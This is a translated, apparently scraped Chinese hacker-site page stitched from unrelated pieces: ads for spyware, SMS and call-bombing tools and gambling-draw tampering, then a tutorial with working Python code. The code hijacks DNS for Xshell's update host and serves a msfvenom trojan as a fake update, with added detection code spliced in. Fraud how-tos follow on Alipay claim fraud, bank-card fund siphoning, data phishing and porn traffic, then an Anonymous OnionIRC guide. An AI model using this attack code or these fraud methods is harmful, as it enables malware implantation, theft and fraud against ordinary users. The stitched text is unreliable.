China Hacker Cloud Platform XSS vulnerability attack tutorial (paid download)

The China Hacker Cloud Platform has now opened its online paid "Hacker Professional Edition" tutorial programme, which currently covers software, tutorials, and resources for the latest 0day vulnerabilities.
To purchase, click Pay [using Alipay or WeChat] and pay by scanning the QR code!
You will then be able to see our XSS vulnerability tutorial. Anyone who wants to learn can refer to the tutorial on the official site! Absolutely top quality, available only here!

Hidden content: ********, pay ¥58.00 to download

If you need any of the products on the China Hacker Cloud Platform official site, contact our advertising customer service!

Delayed SMS bombing, Yunhuzha!

Card and board game see-through (X-ray) cheat assistant!!

SMS bombing

Because of adjustments to part of its domestic business, the China Hacker Cloud Platform official site asks that you contact our customer service if you have any needs!!! Thank you all for your support ~~~~
More software will be released in later videos, since some of it cannot be posted on the platform; just add customer service! Thanks to our old customers and to everyone for your continued support!
Platform official sites: www.anonymouoschina.org  www.anonymouschina.com www.hackerschina.org

WeChat location-based follower boosting

kf lookup

Real-time mobile phone monitoring: spyware

"Call-you-to-death" call bombing with call pickup.. Maren

Location-spoofing show-off app

Fake fund-transfer show-off app (display only, no real function)

"Call-you-to-death" bombing!!!!
More software: phone number (caller ID) spoofing, gambling lottery-draw platforms, hijacking gambling draws and tampering with the winning numbers, and more!

China Hacker Cloud Platform official site recommendation: hacker tools XSS vulnerability video

The China Hacker Cloud Platform recommends two tutorial links; anyone who needs them can download them themselves:

Kali Linux by 颖奇L’Amore tutorial series, 2015

Link: https://pan.baidu.com/s/1KkTv1IBZH1EFYaxnmAoy1g  Password: 5bya

[Top hacker tutorials 2017]

Extraction password: foshanxinxin

Copy the links and download them yourselves ^_^

And one more XSS vulnerability video while we are at it

XSS vulnerability attack
Link: https://pan.baidu.com/s/1VUAjAEl1qpiXf1wrc-5atg  Password: 4qa9

Follow the platform's sites for more: www.anonymouschina.org www.anonymouschina.com www.hackerschina.org (international version)

China Hacker Cloud Platform teaches you: hijacking DNS to implant a trojan through traffic (an experiment)


Follow our official site for more. Because the old domestic domain has been blocked, the domains currently reachable normally from within China are: www.anonymouschina.org  www.anonymouschina.com
The international site, or overseas servers, can be reached normally at: www.hackerschina.org
Preface

When penetrating a target, one usually starts from three directions: web applications, network devices, and targeted phishing. Suppose we have taken control of a network device in the target network, such as a router, and the intranet users' traffic passes through it. How do we turn that into access to their machines?

In that situation we can capture packets on the router and analyse the users' traffic, for example the update request packets sent when software such as Xshell or Notepad++ starts, and then replace the HTTP response of the software update so that a trojan is implanted.

Traffic is usually analysed with tcpdump. If you only have the router's admin backend and nowhere to execute commands, you can use a DNS server together with an HTTP proxy to intercept the traffic.

Here we demonstrate hijacking a software update server in order to implant a trojan.

1. Deploying the DNS server

For convenience of demonstration, the DNS server on the victim machine is changed to the attacker's IP.

Download the sqlmap project and extract dns.py from the sqlmap\sqlmap-stable\lib\request directory.

Run it and see the effect.

After a ping from the user's machine, the DNS server side has received the domain resolution request and answered with 127.0.0.1.

But this script answers every domain resolution request with 127.0.0.1,

so it needs to be modified.

Our requirement is to resolve domains normally and then hijack only certain specified domains.

The modified code is as follows

#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
# Python 2 script (str-based packets, print statements); requires dnspython for dns.resolver.

import os
import re
import socket
import threading
import time
import dns.resolver


class DNSQuery(object):
    """
    Used for making fake DNS resolution responses based on received
    raw request

    Reference(s):
        http://code.activestate.com/recipes/491264-mini-fake-dns-server/
        https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
    """

    def __init__(self, raw):
        self._raw = raw
        self._query = ""

        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits

        if type_ == 0:                                  # Standard query
            i = 12
            j = ord(raw[i])

            while j != 0:                               # walk the length-prefixed labels of QNAME
                self._query += raw[i + 1:i + j + 1] + '.'
                i = i + j + 1
                j = ord(raw[i])

    def response(self, resolution):
        """
        Crafts raw DNS resolution response packet
        """

        retVal = ""

        if self._query:
            retVal += self._raw[:2]                                             # Transaction ID
            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)
            retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts
            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query
            retVal += "\xc0\x0c"                                                # Pointer to domain name
            retVal += "\x00\x01"                                                # Type A
            retVal += "\x00\x01"                                                # Class IN
            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)
            retVal += "\x00\x04"                                                # Data length
            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP

        return retVal


class DNSServer(object):
    def __init__(self):
        # Upstream resolver used for every domain that is not hijacked
        self.my_resolver = dns.resolver.Resolver()
        self.my_resolver.nameservers = ['8.8.8.8']
        self._check_localhost()
        self._requests = []
        self._lock = threading.Lock()
        try:
            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)
        except AttributeError:
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind(("", 53))
        self._running = False
        self._initialized = False

    def _check_localhost(self):
        response = ""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(("", 53))
            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com
            response = s.recv(512)
        except:
            pass
        finally:
            if response and "google" in response:
                raise socket.error("another DNS service already running on *:53")

    def pop(self, prefix=None, suffix=None):
        """
        Returns received DNS resolution request (if any) that has given
        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)
        """

        retVal = None

        with self._lock:
            for _ in self._requests:
                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
                    retVal = _
                    self._requests.remove(_)
                    break

        return retVal

    def get_domain_A(self, domain):
        # Resolve the domain upstream and return the first A record found
        try:
            results = self.my_resolver.query(domain, 'A')
            for i in results.response.answer:
                for j in i.items:
                    try:
                        ip_address = j.address
                        if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address):
                            return ip_address
                    except AttributeError as e:
                        continue
        except Exception as e:
            return '127.0.0.1'

    def run(self):
        """
        Runs a DNSServer instance as a daemon thread (killed by program exit)
        """

        def _():
            try:
                self._running = True
                self._initialized = True

                while True:
                    data, addr = self._socket.recvfrom(1024)
                    _ = DNSQuery(data)
                    domain = _._query[:-1]  ###### exploit
                    ip = self.get_domain_A(domain)
                    if domain == 'cdn.netsarang.net':        # hijacked domain -> attacker host
                        ip = '192.168.80.142'
                    print domain, ' -> ', ip
                    self._socket.sendto(_.response(ip), addr)

                    with self._lock:
                        self._requests.append(_._query)

            except KeyboardInterrupt:
                raise

            finally:
                self._running = False

        thread = threading.Thread(target=_)
        thread.daemon = True
        thread.start()


if __name__ == "__main__":
    server = None
    try:
        server = DNSServer()
        server.run()

        while not server._initialized:
            time.sleep(0.1)

        while server._running:
            while True:
                _ = server.pop()

                if _ is None:
                    break
                else:
                    domian = _[:-1]
                    #print "[i] %s with A %s" % (domian, server.get_domain_A(domian))

            time.sleep(1)

    except socket.error, ex:
        if 'Permission' in str(ex):
            print "[x] Please run with sudo/Administrator privileges"
        else:
            raise

    except KeyboardInterrupt:
        os._exit(0)

    finally:
        if server:
            server._running = False

This script forwards the user's DNS requests to Google's DNS server (8.8.8.8) so that the user can browse normally, and then hijacks only the specified domains.

As you can see, the user can now browse normally.

Next, deploy the HTTP proxy server.

I have already written the code:

# -*- coding: UTF-8 -*-
# Python 2 script
import socket
import threading, getopt, sys, string
import re

# Default listen backlog and port
backlog = 50
port = 80
file_contents = open('myrat.exe', 'rb').read()


def req_server():
    # Hand-written response; Content-Length must match the size of myrat.exe
    return 'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n' + file_contents


def jonnyS(client, address):
    try:
        # Set the timeout
        client.settimeout(500)
        # Size of the receive buffer
        buf = client.recv(2048)
        print buf
        # Answer every request with the prepared response carrying the binary
        client.send(req_server())
    # Report and exit on timeout
    except socket.timeout:
        print 'time out'
    # Close the connection with the client
    client.close()


def main():
    # Create the socket object by calling the socket constructor
    # AF_INET is the IP address family, SOCK_STREAM a stream socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Bind the socket to an address: first parameter the IP address, second the port
    sock.bind(('0.0.0.0', port))
    # Set the maximum number of pending connections
    sock.listen(backlog)
    while True:
        # The server socket waits for a client connection via accept()
        client, address = sock.accept()
        thread = threading.Thread(target=jonnyS, args=(client, address))
        thread.start()


if __name__ == '__main__':
    main()

What this does is respond directly with a binary file, i.e. our trojan, as soon as the user's HTTP request arrives.

The effect is as follows

Many software updates go over HTTPS, so we also need to set up an HTTPS proxy server.

Setting up the HTTPS proxy server

The code is as follows

# Python 3 script
import socketserver, ssl, time


class MyHTTPSHandler_socket(socketserver.BaseRequestHandler):
    def handle(self):
        # Wrap the accepted TCP connection in TLS using the generated certificate
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.load_cert_chain(certfile="cert.pem")
        SSLSocket = context.wrap_socket(self.request, server_side=True)
        self.data = SSLSocket.recv(1024)
        print(self.data)
        file_contents = open('myrat.exe', 'rb').read()
        # Header must be bytes in Python 3 so it can be concatenated with the file contents
        buf = b'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n' + file_contents
        SSLSocket.send(buf)


if __name__ == "__main__":
    port = 443
    httpd = socketserver.TCPServer(('0.0.0.0', port), MyHTTPSHandler_socket)
    httpd.serve_forever()

Run openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes to generate a self-signed certificate (key and certificate are written to the same PEM file).
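The HTTP and HTTPS responders above return the same hand-written response no matter what was requested. The checker below is an added example of mine, not code from the article, showing what an update client or an egress proxy can verify before trusting an update body: that Content-Length matches the bytes actually received (the responders hard-code 303641), that the media type is the one the update endpoint is expected to return, that the body is not a PE executable (MZ magic) where a manifest was expected, and that the Date header is close to the local clock (the responders pin it to 24 May 2018). The sample responses are constructed inline; the 64-byte MZ stub is not a real executable, and expected_type, MAX_DATE_SKEW and SAMPLE_NOW are assumptions of this example.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

MAX_DATE_SKEW = timedelta(days=1)  # assumed tolerance between the Date header and the local clock


def parse_http_response(raw):
    """Split a raw HTTP/1.x response into status, headers (lower-cased names) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"version": parts[0], "status": int(parts[1]), "headers": headers, "body": body}


def update_response_indicators(raw, expected_type="text/xml", now=None):
    """Return the reasons (possibly none) not to trust `raw` as a software-update response."""
    resp = parse_http_response(raw)
    headers, body = resp["headers"], resp["body"]
    findings = []
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("content-length-mismatch:%s!=%d" % (declared, len(body)))
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    if media_type != expected_type:
        findings.append("unexpected-content-type:%s" % media_type)
    if body[:2] == b"MZ":  # DOS/PE header magic: an executable where a manifest was expected
        findings.append("pe-executable-body")
    if now is not None and "date" in headers:
        try:
            sent = parsedate_to_datetime(headers["date"])
            if abs(now - sent) > MAX_DATE_SKEW:
                findings.append("stale-date-header")
        except (TypeError, ValueError):
            findings.append("unparseable-date")
    return findings


# Constructed sample: the response the responders above send, with a 64-byte stand-in
# for the binary (MZ magic followed by padding; not a real executable).
HIJACKED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\n"
    b"Last-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\n"
    b'ETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\n'
    b"Date: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n"
    + b"MZ" + b"\x90" * 62
)

# Constructed sample: a plausible manifest response from a genuine update endpoint.
BENIGN_BODY = b'<?xml version="1.0"?><update version="6.0"/>'
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/xml; charset=utf-8\r\n"
    + b"Content-Length: %d\r\n" % len(BENIGN_BODY)
    + b"Date: Sat, 30 Jun 2018 12:00:00 GMT\r\nConnection: close\r\n\r\n"
    + BENIGN_BODY
)

SAMPLE_NOW = datetime(2018, 6, 30, 12, 30, tzinfo=timezone.utc)  # assumed local clock for the samples

if __name__ == "__main__":
    for label, raw in (("hijacked", HIJACKED_RESPONSE), ("benign", BENIGN_RESPONSE)):
        print(label, update_response_indicators(raw, now=SAMPLE_NOW))
```

None of these checks replaces a signature on the update itself; they are cheap triage that catches exactly the fixed-header responder shown above, where every header is a constant copied from some other server.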

Once that is set up, configure the trojan; msf is used here for the demonstration.

msfvenom -p windows/ -f exe -o myrat.exe

Then look at Xshell's update request.

The domain is cdn.netsarang.net; look at the traffic.

You can see it goes over HTTPS.

Add the following to the DNS server

Set up the HTTPS server

Run the script and the msf listener

Video of the result

Summary

1. Traffic replacement can be aimed at applications such as Firefox that auto-update or update silently in the background; this gives a high success rate and a low chance of being noticed.

2. When the update package is requested over HTTPS, pay attention to the certificate problem; you can try to get around it with a CNAME, for example redirecting www.baidu.com to www.exploit.com on the DNS server. We hold a valid certificate for www.exploit.com, so no error is raised.

3. Changing the DNS settings on the router can also serve as a means of persistent control: if access is lost some day, just implant again.
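What a resolver-side or endpoint monitor can look for to catch the modified DNS server script above, and the CNAME redirection of summary point 2, as an added defensive example that is not part of R1ngk3y's article: the code below is mine. It parses raw DNS responses (including the 0xC00C compression pointer the script emits) and flags the traces that script leaves behind: the authoritative-answer bit set on a recursive answer (the script's flags are 0x8580), a 32-second TTL, an A record for a public update host that points into RFC 1918 space, and a CNAME whose target lies outside the queried zone. The sample packets are constructed inline with struct; MIN_SANE_TTL and the two-label zone heuristic are assumptions (a production check would use the Public Suffix List), and 203.0.113.0/24 is a documentation range standing in for a real CDN address.

```python
import ipaddress
import struct

MIN_SANE_TTL = 60  # assumed: the forged answers carry a 32-second TTL, real CDN records are longer

# Blocks a public update host should never resolve to (RFC 1918, loopback, link-local, "this" network)
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8")]


def encode_name(name):
    """Dotted name -> DNS wire-format labels (uncompressed)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_response(txid, flags, qname, answers):
    """Constructed-sample builder: one IN question plus answers given as (owner, type, ttl, rdata);
    type 1 = A with dotted IPv4 rdata, type 5 = CNAME with a name as rdata. An owner equal to the
    question name is written as the 0xC00C compression pointer, exactly as the server script does."""
    pkt = struct.pack(">HHHHHH", txid, flags, 1, len(answers), 0, 0)
    pkt += encode_name(qname) + struct.pack(">HH", 1, 1)
    for owner, rtype, ttl, rdata in answers:
        rd = ipaddress.IPv4Address(rdata).packed if rtype == 1 else encode_name(rdata)
        owner_bytes = b"\xc0\x0c" if owner == qname else encode_name(owner)
        pkt += owner_bytes + struct.pack(">HHIH", rtype, 1, ttl, len(rd)) + rd
    return pkt


def read_name(pkt, off):
    """Decode a (possibly compressed) name; returns (name, offset just past it)."""
    labels, end, jumped = [], None, False
    while True:
        length = pkt[off]
        if (length & 0xC0) == 0xC0:  # two-byte pointer back into an earlier name
            if not jumped:
                end = off + 2
            jumped = True
            off = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_response(pkt):
    """Header, question name and answer section of a raw DNS response."""
    txid, flags, qdcount, ancount = struct.unpack(">HHHH", pkt[:8])
    off, qname = 12, None
    for _ in range(qdcount):
        name, off = read_name(pkt, off)
        off += 4  # QTYPE + QCLASS
        qname = qname or name
    answers = []
    for _ in range(ancount):
        owner, off = read_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1:
            value = str(ipaddress.IPv4Address(pkt[off:off + rdlen]))
        elif rtype == 5:
            value, _ = read_name(pkt, off)
        else:
            value = pkt[off:off + rdlen].hex()
        answers.append((owner, rtype, ttl, value))
        off += rdlen
    return {"id": txid, "flags": flags, "qname": qname, "answers": answers}


def zone_of(name):
    """Last two labels as a stand-in for the registrable domain (assumption; use the Public Suffix List in production)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def hijack_indicators(pkt):
    """Return (query name, list of indicator strings) for one raw DNS response."""
    resp = parse_response(pkt)
    findings = []
    if resp["flags"] & 0x0400:  # AA bit: a recursive resolver is never authoritative for third-party zones
        findings.append("aa-flag-on-recursive-answer")
    for owner, rtype, ttl, value in resp["answers"]:
        if ttl < MIN_SANE_TTL:
            findings.append("short-ttl:%d" % ttl)
        if rtype == 1 and any(ipaddress.IPv4Address(value) in net for net in NON_ROUTABLE):
            findings.append("non-routable-address:%s" % value)
        if rtype == 5 and zone_of(value) != zone_of(resp["qname"]):
            findings.append("cname-out-of-zone:%s->%s" % (owner, value))
    return resp["qname"], findings


# Constructed samples: 0x8580 and TTL 32 are what the server script emits; 0x8180 is an ordinary recursive answer.
HIJACKED = build_response(0x1234, 0x8580, "cdn.netsarang.net", [("cdn.netsarang.net", 1, 32, "192.168.80.142")])
LEGIT = build_response(0x1235, 0x8180, "cdn.netsarang.net", [("cdn.netsarang.net", 1, 300, "203.0.113.10")])
CNAME_HOP = build_response(0x1236, 0x8180, "www.baidu.com",
                           [("www.baidu.com", 5, 300, "www.exploit.com"), ("www.exploit.com", 1, 300, "203.0.113.20")])

if __name__ == "__main__":
    for pkt in (HIJACKED, LEGIT, CNAME_HOP):
        print(hijack_indicators(pkt))
```

A TLS client that validates correctly matches the certificate against the name it was asked to connect to (www.baidu.com in point 2), not against the CNAME target, so the redirection described there does not by itself satisfy certificate validation; the cname-out-of-zone finding is still worth alerting on, because it is precisely what such a resolver emits.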

*Original author of this article: R1ngk3y. This article belongs to the FreeBuf original reward programme; reproduction without permission is prohibited.

Black-market data trading: the phishing of user information decoded! (for more on the grey industry, follow our site hackerschina.org)

Dear users, every week we publish one instalment decoding the black market. These tutorials are also meant to make more people pay attention to the network, to network security, and to keeping their own private information from leaking!
But China is a major country for information leaks! Data security starts with ourselves!
Tutorial begins:
First, some "merchants" use group-buying to phish users.
For example, a garment costs 300 yuan. User A forms a group and recommends users; users B and C join the group, splitting like cells…. and the group purchase succeeds. User A gets the item for 0 yuan. The information of users B and C has already leaked to the merchant. Then B and C also form groups, and the data of every other user is caught up in the leak! The merchant can collect all of these users' information,
and sell that information to hackers! Of course…. this data is worth far more than a 300-yuan product.. do you get it now?
The above described phishing by merchants.
Next we describe setting up your own platform for phishing, with survey-type questionnaires! Fun ones! Afterwards you can intercept the users' information.
A man-in-the-middle attack on a mobile LAN can also steal the target user's information!
There is another method! Scanning QR codes. Free cups… free power banks.. plenty of users fall for it!
In addition, WeChat official accounts can steal information from all of their users through certain mini-programs.
This includes apps requesting access to the user's contacts while acquiring users… WiFi Master Key (万能钥匙) is a good example~~ you can Baidu it… (no further explanation of WiFi Master Key here; Baidu has plenty… I don't know the details myself… if you want to know more about stealing user information.. Baidu it.. there are plenty of methods!!)
Now comes the most important step…
Find the people who buy data.. how much can this data sell for.. an astonishing price!
Company insiders… delivery riders.. and others are also channels for data leaks..
Do you get all of this now?
Will your own information still be safe from now on……~~~~~

Grey industry: reselling bank cards and cashing out through limited-quota transactions (black market preying on black market, decoded). Because many people think the grey industry is very profitable! Let's decode it!

The grey industry chain exploits serious loopholes and legal gaps in today's Chinese market! So many people have quit their jobs and gone into the grey industry! Here we tell the stories of the black market preying on the black market!
Case description of reselling full bank-card sets and "black eats black":
No specific screenshots; you can follow the description yourselves!
First, search Baidu for keywords such as (where can I buy bank cards)
|Or search QQ groups: bank card information, buy bank cards, etc.
Next comes the trade:
First find the people who are able to trade!

The card seller enables the fund-pooling (资金归集) function, or a secondary account, to finally cash out the funds. Details follow (in the third person):

Tutorial begins

Card-selling "experts" almost always close the deal by means you can accept, such as cash on delivery by post or a Taobao transaction. A full set of card materials includes the bank card itself, the USB security key (U盾), the phone card, the account-opening documents, and the mobile SIM bound at account opening; some even come with a basic feature phone. The completeness of the materials is flawless, and the price is low enough to get you excited.

Perhaps you think these card sellers are purely selling cards to make money. If so, you are wrong.

Because selling you the card is only laying the bait; afterwards they fleece you for a much larger sum. This rather fits the saying "free is the most expensive".

In fact, selling you cards yields a double income: one is selling directly to you, earning the price of the card; the other is later draining the money on your card, making you work for them for nothing.

The first way of making money needs no elaboration; it is a simple buyer-seller relationship. Here we focus on the second: how they drain the money on your card.

Because most people who buy these cards use them for money laundering or other projects that cannot see daylight, the people who sold you the cards use fund pooling to move your hard-earned, ill-gotten money into an account they set up in advance.

The so-called "fund pooling" that robs your account means enabling the "pooling function" or a "secondary account" and setting a limit on your balance; when your balance reaches the set threshold, the funds in the account are automatically transferred to another designated account, and that amount can be set to anything.

Even worse, the other party can also set your withdrawal and transfer limits. Their play is to set your account limit high while setting the transfer and withdrawal limits very low. So you basically cannot withdraw the money, and because they hold the primary-account privileges, they can move the secondary account's money away.

If you think this is good, please support us! More to come.. stories from the black market!! Want to make money? Come and look! The big exposé!

Grey industry: porn sites, WeChat platforms, QQ platforms and other live-streaming platforms for borderline online money-making! (exposé)

As for porn sites, sometimes you don't even need your own resources; as long as you drive traffic, you can make money online!
Tutorial exposé begins:
Make an HTML page yourself, or set up a site directly, and embed the resources! (Just reuse other sites' resources.. or buy your own.) One cloud drive costs 60 yuan for 10,000 films or more!
WeChat groups and QQ groups then become the trading platform: migrant workers.. students.. these groups are easy! (We don't do illegal things! This is an exposé.)
….. The advertising business truly makes money!, but the internet should be clean! This article has a sequel! But.. I don't want to post any more!…. This is just one of them….. a cancer of the internet! Please stay away!
Because many apps and websites have been taken down recently! So… the online environment needs all of us to maintain it together!
But wherever there are people there is online money-making; if you have 1000 people… whatever you throw out, you harvest that much!
We are only exposing it! We are only warning everyone to stay away from porn, gambling and drugs!…. The internet needs to be clean! Thank you all for your continued support!

Starting today, one article per week on grey-industry online money-making! Tens of thousands a day! (Grey industry: Alipay insurance fraud exposed)

About the grey industry: some people's first thought is that it is very profitable! But could you do it? Here Hacker Cloud exposes one grey online money-making project every week! You may learn it, but you may not break the law! You may make money online, but you must not do this yourself!
Some people commit insurance fraud through Alipay's claims loophole.. sometimes it does succeed, but what if it doesn't?
So how can you make money online more safely?….
The point here is to sell this Alipay (zfb) insurance-fraud (pian bao) tutorial!
Sold to one person, that is 200 yuan;
two people, 400 yuan;
10 people, 2000 yuan;
100 people, 20000 yuan! So if you can sell to 10 people a day, imagine a month!
OK, the exposé begins:
The whole project exploits a logical flaw in Alipay's claims process for stolen accounts to commit insurance fraud!
If you fake the appearance of your Alipay being stolen, Alipay will pay out unconditionally!
So how do you fake an Alipay theft?
Disguising the IP address is the most basic step: you can temporarily use a server, so that after logging in locally the login IP seen from the server changes! Most people know this, right? Second, use a server or a jump host to make fraudulent charges on the Alipay account (a friend can do this, or you can do it yourself). Third, wait for Alipay's remote-login warning, then quickly log in yourself… check the balance and so on… next apply for a claim… and then.. you need to make up a story! But this needs a good chain of evidence.. make sure nothing goes wrong (low amounts, 99%)
The way to explain the evidence chain for the process.. think of it yourself, it's simple.. supermarkets… virtual currency and so on can all be used for the transactions!
Weekly grey-industry exposé… next issue coming! If you want to make money online, follow this site www.hackerschina.org

Anonymous Launches OnionIRC, Specifically for “Training the Next Generation of Hackers”

Anonymous members on the deep web have launched a new chat service specifically “to teach the next generation of hacktivists.” What sets this chat apart from others is that unlike AnonOps IRC, the chat will not be used to plan or conduct missions. Unlike services offered by AnonHQ, 4Chan or Reddit, it will not be used for general conversation and information sharing.

As stated in the video below, in response to the efforts of governments around the world to censor the movement, the chat hopes “to arm the current generation of internet activists with education.” Their plan is to provide virtual classrooms where teachers can give instruction on a variety of subjects including security culture; hacking & technical tutorials; history; and how to properly utilize encryption & anonymity software.


How To Access OnionIRC

A step-by-step tutorial on how to connect to the OnionIRC using your Tor Browser and the HexChat IRC client can be found below:

Step 1: Download Tor Browser and HexChat. You can download them from Softpedia mirrors, or from their homepages.

Step 2: Open HexChat and click ADD. A screenshot of the appropriate settings is available below.

HexChat login settings

In the Login Method section, you can leave those fields blank for the first visit. After you connect to the IRC for the first time, make sure to register an identity.

The rest of the information you need to keep in mind is the OnionIRC URL and port, which are: onionirchubx5363.onion/6667

Step 3: Open the Tor Browser, and keep it open for the time you are on the OnionIRC. In HexChat’s Settings option, go to Network, and then to Network Setup.

Here you’ll set up a proxy server with the details from the image below. Keep in mind that, every time you close the Tor Browser, these settings will be wiped, and you’ll have to apply them all over again. That’s it, you’re done. Connect to the OnionIRC.

HexChat proxy settings

You can follow the movements, find new class schedules and download content previously covered on the Anonymous OnionIRC Twitter page: https://twitter.com/onionirc

How Else To Reach Anonymous

AnonBoards: Connected with AnonHQ. Open web chat and online forums: www.anonboards.com

AnonOps IRC: Hot action and adventure. Home to #AntiSec, #LulzSec: https://newblood.anonops.com/ | https://anonops.com/ | https://webchat.anonops.com/

AnonNet IRC: The father of anon IRCs. For lulz, fun, chat, tech: http://site.anonnet.org/

CyberGorilla IRC: Only accepts TOR connections. Small and secure community: https://cyberguerrilla.info/irc-client-setup/

4Chan Random Board:http://boards.4chan.org/b/

Reddit Anonymous Board:https://www.reddit.com/r/anonymous/

Reddit WTF Board:https://www.reddit.com/r/WTF/

Anonymous Just Took Down 1/5 Of Dark Web’s Child Pornography (dark-web access details and connection addresses are all included; translate it and go wild!)

The Dark Web is the encrypted network that exists between Tor servers and their clients aka cyber criminals, activists and many others who want encrypted communications. The Tor Network, the only network that protects the user’s identity and does not watch their Internet activities, helps Internet users retain their privacy online — especially when they are being watched by third parties.

Since most of the Dark Web is a haven for drug markets, pedophiles and sex traffickers who use Tor or set up anonymous .onion websites to hide their location and to ply their illegal trade, it becomes difficult for law enforcement to unmask the criminals seeking refuge in the shadows.

In their attempt to uncover the creators, possessors, and subscribers of child pornography, a group of anonymous hackers breached Freedom Hosting II — the largest host of Dark Web sites accessible only through Tor — downloaded gigabytes of data, and took down and defaced some 10,613 .onion websites.

The anonymous hacktivists claimed over 50% of the data stored on the Freedom Hosting II servers contained child pornography. International Business Times reported that the hackers stole 75 GB worth of files and 2.6 GB of databases, which they offered to return for 0.1 bitcoin, around $100.

According to Sarah Jamie Lewis, an independent anonymity & privacy researcher who spotted the mass hack as part of her regular scans of the Onion space (Dark Web sites running on the Tor network), Freedom Hosting II was hosting an estimated 15% to 20% of all websites on the Dark Web.

This means that the hack took down nearly a fifth of the Dark Web. Lewis told The Verge: “This is a major blow considering many were personal or political blogs and forums. In the short term, a lot of diversity has disappeared from the Dark Web.”

Security researcher Chris Monteiro claimed the Freedom Hosting II hack may have disrupted a substantial number of botnets, which are increasingly used by cyber criminals to launch large-scale DDoS attacks.

Monteiro also discovered the .onion websites were not only hosting botnets, but also fraud sites, sites peddling hacked data, weird fetish portals, and child abuse sites targeting both English and Russian speaking buyers. Websites defaced in the Freedom Hosting II hack include:


In an interview with VICE, the hackers explained why and how they took down the Dark Web hosting provider:

“Initially we didn’t want to take down FHII. But then we found several large child pornography sites which were using more than Freedom Hosting II’s stated allowance. Usually, Freedom Hosting II has a quota of 256MB per site, but these illegal sites consisted of gigabytes of material. This suggests they paid for hosting and the admin knew of those sites. That’s when I decided to take it down instead.”

In 2011 also, as part of Operation Darknet, Anonymous hacked and DDoSed the first Freedom Hosting for hosting child pornography websites. In 2013, when the first Freedom Hosting was hosting half of all Dark Web sites, the FBI used a misconfiguration in the Tor Browser setup to identify visitors to such websites, took down the service, and arrested its owner Eric Eoin Marques in Ireland. The charges laid against Marques were of facilitating the distribution of online child pornography.